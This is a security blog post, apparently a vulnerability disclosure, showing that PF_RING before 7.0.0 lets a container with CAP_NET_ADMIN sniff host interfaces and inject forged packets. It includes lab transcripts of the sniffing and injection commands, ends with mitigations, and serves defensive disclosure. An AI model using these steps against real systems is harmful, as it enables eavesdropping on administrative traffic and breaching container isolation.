Breaking namespace isolation with PF_RING before 7.0.0

Linux hardening and proper isolation using containerization can be tricky, especially when performance is critical.

We recently helped a client design a secure network appliance that involves sniffing network traffic. The device has strict security and performance constraints.

This post reports on our experience with the unlikely integration of fast sniffers and Linux containers.

Context

Let's consider a network appliance running Linux that uses PF_RING to lift packets from the NIC and feed them to sniffers isolated in containers.

PF_RING is a faster alternative to classic RAW socket sniffing. In a nutshell, packets coming from the NIC driver are put in a circular buffer without any processing. The sniffer then maps the buffer into userspace with mmap() to access the network packets.
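
As a rough mental model only, the toy sketch below mimics that flow in Python: a producer copies packets into fixed-size slots of a memory-mapped ring, and a consumer reads them back from the same mapping. The slot size, the ring depth and the ToyRing class are made up for illustration; they do not reflect PF_RING's actual memory layout or API.

```python
import mmap
import struct

SLOT_SIZE = 64                 # hypothetical fixed slot size, in bytes
NUM_SLOTS = 4                  # hypothetical ring depth
HEADER = struct.Struct("<H")   # 2-byte length prefix stored in each slot


class ToyRing:
    """Toy single-producer/single-consumer ring over an anonymous mmap."""

    def __init__(self):
        self.buf = mmap.mmap(-1, SLOT_SIZE * NUM_SLOTS)
        self.head = 0  # index of the next slot the producer writes
        self.tail = 0  # index of the next slot the consumer reads

    def push(self, packet: bytes) -> bool:
        """Copy a packet into the next free slot; drop it if the ring is full."""
        if self.head - self.tail == NUM_SLOTS:
            return False
        if len(packet) > SLOT_SIZE - HEADER.size:
            raise ValueError("packet larger than slot")
        offset = (self.head % NUM_SLOTS) * SLOT_SIZE
        HEADER.pack_into(self.buf, offset, len(packet))
        start = offset + HEADER.size
        self.buf[start:start + len(packet)] = packet
        self.head += 1
        return True

    def pop(self):
        """Read the oldest packet from the mapping, or None if the ring is empty."""
        if self.tail == self.head:
            return None
        offset = (self.tail % NUM_SLOTS) * SLOT_SIZE
        (length,) = HEADER.unpack_from(self.buf, offset)
        start = offset + HEADER.size
        packet = bytes(self.buf[start:start + length])
        self.tail += 1
        return packet


ring = ToyRing()
ring.push(b"\x52\x54\x00\x4c\x97\xdf")  # the "driver" side
print(ring.pop())                        # the "sniffer" side
```

The point of the design is that the consumer never asks the kernel for each packet; it only reads memory it already has mapped, which is where the speed comes from.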

PF_RING vanilla

Considering the security hardening requirements of the appliance, the sniffer should be as isolated as possible. Isolation should have as little of a performance impact as possible. Containers are a pretty good fit for this use case.

Before version 7.0.0 (the latest release as of this writing), PF_RING didn't support network namespaces. The only way for the sniffers to access the circular packet buffer was to grant them the CAP_NET_ADMIN capability. Granting that capability to a "normal" hardened container isn't great, but with PF_RING it's worse...

Example architecture

Consider the following design for a dummy network sniffer:

Dummy IDS design

To make troubleshooting quick, all containers are fully-fledged Ubuntu distributions. In a real-life scenario the ids-container would be minimal and hardened. LXC v2 is used, but the setup could be replicated with the container provider of your choice.

The host system has 2 network interfaces:

  • administration is performed on the secure LAN if-admin
  • sniffing is possible on the interface if-sniff

 

root@host:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: if-admin: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 52:54:00:4c:97:df brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.221/24 brd 192.168.122.255 scope global if-admin
       valid_lft forever preferred_lft forever
    inet6 fe80::5054:ff:fe4c:97df/64 scope link
       valid_lft forever preferred_lft forever
3: if-sniff: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 22:22:22:22:22:22 brd ff:ff:ff:ff:ff:ff
    inet 192.168.110.2/24 brd 192.168.110.255 scope global if-sniff
       valid_lft forever preferred_lft forever
    inet6 fe80::2022:22ff:fe22:2222/64 scope link
       valid_lft forever preferred_lft forever
4: br0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.1/24 brd 192.168.0.255 scope global br0
       valid_lft forever preferred_lft forever
    inet6 fe80::4030:e8ff:fe9a:c32b/64 scope link
       valid_lft forever preferred_lft forever
6: veth89U9YK@if5: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master br0 state UP group default qlen 1000
    link/ether fe:f8:d8:60:13:37 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::fcf8:d8ff:fe60:1337/64 scope link
       valid_lft forever preferred_lft forever

root@host:~# ls -l /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May  4 14:40 /proc/self/ns/net -> net:[4026531957]

veth89U9YK@if5 is the host-side end of the veth pair whose other end is internet0 in app-container.

app-container only exposes sensitive services on the interface if-admin:

root@app-container:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
5: internet0@if6: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether 00:16:01:54:9a:34 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.2/24 brd 192.168.0.255 scope global internet0
       valid_lft forever preferred_lft forever
    inet6 fe80::216:1ff:fe54:9a34/64 scope link
       valid_lft forever preferred_lft forever

root@app-container:~# ls -al /proc/self/ns/net
lrwxrwxrwx 1 root root 0 May  4 12:48 /proc/self/ns/net -> net:[4026532250]

root@app-container:~# ss -tan
State      Recv-Q Send-Q        Local Address:Port          Peer Address:Port
LISTEN     0      5               192.168.0.2:8080                     *:*

# The exposed service is reachable by the administrator
admin@it:~$ curl 192.168.122.221
Hello Admin

ids-container does not have any interface configured as it accesses if-sniff through PF_RING with CAP_NET_ADMIN:

root@ids-container:~# ip a
1: lo: <LOOPBACK> mtu 65536 qdisc noop state DOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

root@ids-container:~# ls /sys/class/net/
lo

root@ids-container:~# grep ^Cap /proc/self/status
CapInh: 0000000000000000
CapPrm: 0000000000001000
CapEff: 0000000000001000
CapBnd: 0000000000001000
CapAmb: 0000000000000000

root@ids-container:~# capsh --decode=0000000000001000
0x0000000000001000=cap_net_admin

root@ids-container:~# ls -ls /proc/self/ns/net
0 lrwxrwxrwx 1 root root 0 May  4 12:52 /proc/self/ns/net -> net:[4026532310]
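
For reference, the capability masks above are plain bitmasks in which bit N stands for capability number N. The sketch below decodes such a mask by hand. The decode_caps helper is hypothetical and only names the four network-related capabilities; any other bit is reported by its number.

```python
# Capability numbers from linux/capability.h (network-related subset only).
NET_CAPS = {
    10: "cap_net_bind_service",
    11: "cap_net_broadcast",
    12: "cap_net_admin",
    13: "cap_net_raw",
}


def decode_caps(mask_hex):
    """Return the names of the capabilities set in a /proc/<pid>/status mask."""
    mask = int(mask_hex, 16)
    names = []
    bit = 0
    while mask:
        if mask & 1:
            # Fall back to the raw bit number for capabilities not listed above.
            names.append(NET_CAPS.get(bit, "cap_%d" % bit))
        mask >>= 1
        bit += 1
    return names


print(decode_caps("0000000000001000"))
```

The only bit set in 0x1000 is bit 12, which agrees with the capsh output: the container holds CAP_NET_ADMIN and nothing else.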

Communication between app-container and ids-container is not represented, but let's say it uses a channel that is not based on the networking stack.

On the host, the PF_RING kernel module is loaded with the default configuration and network interfaces are correctly detected:

root@host:~# insmod ./PF_RING-6.6.0/kernel/pf_ring.ko

root@host:~# grep -r . /sys/module/pf_ring/parameters/*
/sys/module/pf_ring/parameters/enable_debug:0
/sys/module/pf_ring/parameters/enable_frag_coherence:1
/sys/module/pf_ring/parameters/enable_ip_defrag:0
/sys/module/pf_ring/parameters/enable_tx_capture:1
/sys/module/pf_ring/parameters/force_ring_lock:0
/sys/module/pf_ring/parameters/min_num_slots:4096
/sys/module/pf_ring/parameters/perfect_rules_hash_size:4096
/sys/module/pf_ring/parameters/quick_mode:0
/sys/module/pf_ring/parameters/transparent_mode:0

root@host:~# cat /proc/net/pf_ring/info
PF_RING Version          : 6.6.0 (unknown)
Total rings              : 0

Standard (non ZC) Options
Ring slots               : 4096
Slot version             : 16
Capture TX               : Yes [RX+TX]
IP Defragment            : No
Socket Mode              : Standard
Cluster Fragment Queue   : 0
Cluster Fragment Discard : 0

root@host:~# ls -1 /proc/net/pf_ring/dev/
br0  if-admin  if-sniff  internet0  vethLXOGMB

Breaking namespace isolation

Everything looks good: we can sniff on the interface if-sniff from inside the ids-container.

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pcount -i if-sniff
Capturing from if-sniff

[...]

=========================
Absolute Stats: [7 pkts rcvd][0 pkts dropped]
Total Pkts=7/Dropped=0.0 %
7 pkts [0.7 pkt/sec] - 398 bytes [0.00 Mbit/sec]
=========================
Actual Stats: 1 pkts [747.6 ms][1.34 pkt/sec]
=========================

This looks good, until you try to sniff the interface any from within the ids-container... and get the packets of if-admin.

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i any -v 2 -f 'tcp port 80'
Capturing from any

[...]

14:03:15.177815 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=133][len=133]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 77 D1 DE 40 00 40 06 F2 72 C0 A8 7A 01 C0 A8 7A DD D4 E0 00 50 9F 50 0F E1 22 04 08 77 50 18 00 E5 76 99 00 00 47 45 54 20 2F 20 48 54 54 50 2F 31 2E 31 0D 0A 48 6F 73 74 3A 20 31 39 32 2E 31 36 38 2E 31 32 32 2E 32 32 31 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 63 75 72 6C 2F 37 2E 35 38 2E 30 0D 0A 41 63 63 65 70 74 3A 20 2A 2F 2A 0D 0A 0D 0A
# GET / HTTP/1.1\r\nHost: 192.168.122.221\r\nUser-Agent: curl/7.58.0\r\nAccept: */*\r\n\r\n

[...]

14:03:15.178253 [52:54:00:4C:97:DF -> 52:54:00:38:2D:01] [TCP][192.168.122.221 -> 192.168.122.1] [caplen=172][len=172]
52 54 00 38 2D 01 52 54 00 4C 97 DF 08 00 45 00 00 9E A3 5E 40 00 3F 06 21 CC C0 A8 7A DD C0 A8 7A 01 00 50 D4 E0 22 04 08 88 9F 50 10 30 50 19 00 E5 76 C0 00 00 53 65 72 76 65 72 3A 20 42 61 73 65 48 54 54 50 2F 30 2E 33 20 50 79 74 68 6F 6E 2F 32 2E 37 2E 36 0D 0A 44 61 74 65 3A 20 46 72 69 2C 20 30 34 20 4D 61 79 20 32 30 31 38 20 31 34 3A 30 33 3A 31 35 20 47 4D 54 0D 0A 43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 74 65 78 74 0D 0A 0D 0A 48 65 6C 6C 6F 20 41 64 6D 69 6E 0A
# Server: BaseHTTP/0.3 Python/2.7.6\r\nDate: Fri, 04 May 2018 14:03:15 GMT\r\nContent-type: application/text\r\n\r\nHello Admin\n

[...]

In principle, any should correspond to all interfaces available in the current network namespace. However, this version of PF_RING doesn't support namespace isolation, so you get access to all of the host's network interfaces, which effectively breaks the isolation.

Sniffing on one specific host network interface is also possible:
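
The namespace identifiers printed earlier confirm that ids-container really does run in its own network namespace, so the leak comes from PF_RING rather than from a misconfigured container. A small sketch of that comparison follows; the helper names are chosen for illustration, and the two constants are copied from the /proc/self/ns/net listings above.

```python
import os
import re


def netns_inode(link_target):
    """Extract the inode number from a link target such as 'net:[4026531957]'."""
    match = re.fullmatch(r"net:\[(\d+)\]", link_target)
    if match is None:
        raise ValueError("unexpected namespace link: %r" % link_target)
    return int(match.group(1))


def current_netns_inode():
    """Inode of the calling process's network namespace (Linux only)."""
    return netns_inode(os.readlink("/proc/self/ns/net"))


# Values taken from the host and ids-container transcripts in this post.
HOST_NETNS = netns_inode("net:[4026531957]")
IDS_NETNS = netns_inode("net:[4026532310]")

# Different inodes mean different network namespaces.
print(HOST_NETNS != IDS_NETNS)
```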

root@ids-container:/# ./PF_RING-6.6.0/userland/examples/pcount -i if-admin -v 2 -f 'tcp port 80'
Capturing from if-admin
14:05:37.490554 [52:54:00:38:2D:01 -> 52:54:00:4C:97:DF] [TCP][192.168.122.1 -> 192.168.122.221] [caplen=74][len=74]
52 54 00 4C 97 DF 52 54 00 38 2D 01 08 00 45 00 00 3C 63 6B 40 00 40 06 61 21 C0 A8 7A 01 C0 A8 7A DD D4 EC 00 50 BC 71 0A 5C 00 00 00 00 A0 02 72 10 76 5E 00 00 02 04 05 B4 04 02 08 0A DC 3A BF 3F 00 00 00 00 01 03 03 07
[...]

One slight complication: listing the host interfaces from the container isn't possible. The pfring_findalldevs() function in the userland library ends up using the results from pfring_mod_findalldevs(), which extracts the interface names from /proc/net/pf_ring/dev/<iface>/info. Unless the LXC configuration explicitly mounts this path into the container, which should never happen, the interface names have to be guessed. On systems with systemd/udev version >= 197, which assigns predictable interface names instead of eth0-style names, a light brute force is required.
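
A minimal sketch of such a guessing loop is shown below. The name patterns (eth<N>, eno<N>, ens<N>, enp<bus>s<slot>, br<N>) are common conventions and not an exhaustive list, the numeric ranges are arbitrary, and can_open is a hypothetical callback that would wrap an actual attempt to open the interface through PF_RING (for example by launching pcount -i <name> and checking whether it starts capturing).

```python
from itertools import product


def candidate_interface_names(max_index=4, max_bus=4, max_slot=32):
    """Yield plausible interface names; the patterns and ranges are assumptions."""
    for prefix in ("eth", "eno", "ens", "br"):
        for index in range(max_index):
            yield "%s%d" % (prefix, index)
    for bus, slot in product(range(max_bus), range(max_slot)):
        yield "enp%ds%d" % (bus, slot)


def find_interfaces(can_open, candidates):
    """Return the candidate names for which the probe callback succeeds."""
    return [name for name in candidates if can_open(name)]


# Stand-in probe for demonstration; a real one would try to open a ring.
fake_host = {"eth0", "enp0s3"}
print(find_interfaces(lambda name: name in fake_host, candidate_interface_names()))
```

Custom names such as if-admin and if-sniff in the example appliance would not be found by pattern generation alone and would need a wordlist.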

Loading the PF_RING module with default configuration also allows for writing packets to network interfaces.

root@host:~# grep TX /proc/net/pf_ring/info
Capture TX               : Yes [RX+TX]

To demonstrate that an arbitrary packet can be injected from ids-container into app-container through PF_RING, a single UDP packet is captured to a pcap file and later injected:

# Captured packet to inject
root@ids-container:~# tcpdump -XX -r UDP_test_packet.pcap
reading from file UDP_test_packet.pcap, link-type EN10MB (Ethernet)
16:48:13.894163 IP 192.168.122.1.54219 > 192.168.122.221.1234: UDP, length 5
    0x0000:  5254 004c 97df 5254 0038 2d01 0800 4500  RT.L..RT.8-...E.
    0x0010:  0021 2982 4000 4011 9b1a c0a8 7a01 c0a8  .!).@.@.....z...
    0x0020:  7add d3cb 04d2 000d 764e 4142 4344 0a    z.......vNABCD.

root@ids-container:./PF_RING-6.6.0/userland/examples# ./pfsend -f /UDP_test_packet.pcap -i internet0 -m 00:16:01:3b:aa:a7 -b 1 -v -S 192.168.0.3 -D 192.168.0.2 -z
Sending packets on internet0
Using PF_RING v.6.6.0
Read 47 bytes packet from pcap file /UDP_test_packet.pcap [0.0 Secs =  0 ticks@0hz from beginning]
Read 1 packets from pcap file /UDP_test_packet.pcap
Dumping statistics on /proc/net/pf_ring/stats/2737-internet0.16
[0] pfring_send(47) returned 47
TX rate: [current 7'751.93 pps/0.00 Gbps][average 7'751.93 pps/0.00 Gbps][total 1.00 pkts]
Sent 1 packets

# In `app-container`, the forged packet is received
root@app-container:/# tcpdump -vv -n -i internet0 -XX
tcpdump: listening on internet0, link-type EN10MB (Ethernet), capture size 262144 bytes
15:50:40.297378 IP (tos 0x0, ttl 64, id 10626, offset 0, flags [DF], proto UDP (17), length 33)
    192.168.0.3.54219 > 192.168.0.2.1234: [udp sum ok] UDP, length 5
        0x0000:  0016 013b aaa7 5254 0038 2d01 0800 4500  ...;..RT.8-...E.
        0x0010:  0021 2982 4000 4011 8ff4 c0a8 0003 c0a8  .!).@.@.........
        0x0020:  0002 d3cb 04d2 000d 175a 4142 4344 0a    .........ZABCD.
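
Note that the IP header checksum differs between the two dumps (0x9b1a in the pcap, 0x8ff4 on the wire) because the source and destination addresses were rewritten with -S and -D. The sketch below recomputes the standard Internet checksum (RFC 1071) over both headers to confirm that the injected packet is well formed; the function name is chosen for illustration and the header bytes are copied from the dumps above.

```python
import struct


def ipv4_header_checksum(header):
    """One's-complement checksum of an IPv4 header, checksum field zeroed."""
    zeroed = header[:10] + b"\x00\x00" + header[12:]
    words = struct.unpack("!%dH" % (len(zeroed) // 2), zeroed)
    total = sum(words)
    # Fold the carries back into the low 16 bits.
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


# 20-byte IPv4 headers from the captured and the injected packet.
original = bytes.fromhex("4500002129824000" "40119b1a" "c0a87a01" "c0a87add")
injected = bytes.fromhex("4500002129824000" "40118ff4" "c0a80003" "c0a80002")

print(hex(ipv4_header_checksum(original)))
print(hex(ipv4_header_checksum(injected)))
```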

Mitigation

Upgrade to version 7.0.0 of PF_RING: this latest version fixes the namespace isolation problem and introduces capture interface whitelisting. If upgrading is not possible, proper configuration of the kernel module combined with host and container hardening can reduce the risk.

Additionally, "Capture TX" should be disabled if your sniffer doesn't use it.

root@host:~# insmod ./pf_ring.ko enable_tx_capture=0
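
To keep an eye on both points, a host-side check along the following lines could parse /proc/net/pf_ring/info. This is only a sketch: it assumes the "key : value" layout shown earlier in this post, which other PF_RING versions may format differently, and the function names are made up.

```python
def parse_pf_ring_info(text):
    """Turn 'key : value' lines into a dict; lines without a colon are skipped."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def audit_pf_ring(fields):
    """Return a list of findings for the two issues discussed in this post."""
    findings = []
    version_field = fields.get("PF_RING Version", "")
    if version_field:
        version = tuple(int(part) for part in version_field.split()[0].split("."))
        if version < (7, 0, 0):
            findings.append("PF_RING older than 7.0.0: no namespace isolation")
    if fields.get("Capture TX", "").startswith("Yes"):
        findings.append("Capture TX is enabled")
    return findings


# Sample copied from the host transcript above; on a real host, read the
# text from /proc/net/pf_ring/info instead.
SAMPLE = """PF_RING Version          : 6.6.0 (unknown)
Total rings              : 0

Standard (non ZC) Options
Capture TX               : Yes [RX+TX]
"""

for finding in audit_pf_ring(parse_pf_ring_info(SAMPLE)):
    print(finding)
```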

Conclusion

We have seen that despite the use of containers, some external components don't support namespaces. In our setup, the isolated sniffer could in fact:

  • Monitor the administration network interface
  • Inject traffic to any network interface
  • Route packets between all network interfaces
  • Exfiltrate sniffed packets back to the attacker

The thing to remember here is that PF_RING is just one example. The same type of vulnerability might be found with netmap, DPDK, Snabbswitch, etc. "This is left as an exercise for the reader" ;)

Performance and security are not always such good friends.